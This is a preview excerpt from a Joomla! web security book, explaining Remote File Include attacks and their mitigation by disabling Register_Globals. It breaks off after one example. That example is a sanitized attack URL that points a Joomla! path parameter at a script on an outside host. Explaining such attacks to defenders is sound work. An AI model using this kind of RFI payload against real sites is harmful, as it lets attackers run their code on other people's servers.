O'Reilly logo

Joomla! Web Security: Secure your Joomla! Website from Common Security Threats with this easy-to-use Guide by Tom Canavan

Stay ahead with the world's most comprehensive technology and business learning platform.

With Safari, you learn the way you learn best. Get unlimited access to videos, live online training, learning paths, books, tutorials, and more.

Start Free Trial

No credit card required

Remote File Includes

An RFI vulnerability exists when an attacker can insert a script or code into a URL and command your server to execute the evil code.

It is important to note that File Inclusion attacks, such as these, can mostly be mitigated by turning Register_Globals off.

Turning this off ensures that the $page variable is not treated as a super-global variable, and thus does not allow an inclusion.

The following is a sanitized attempt to attack a server in just such a manner:

http://www.exampledomain.com/?mosConfig_absolute_path=http://www.
forum.com/update/xxxxx/sys_yyyyy/i?

If the site in this example did not have appropriate safeguards ...

With Safari, you learn the way you learn best. Get unlimited access to videos, live online training, learning paths, books, interactive tutorials, and more.

Start Free Trial

No credit card required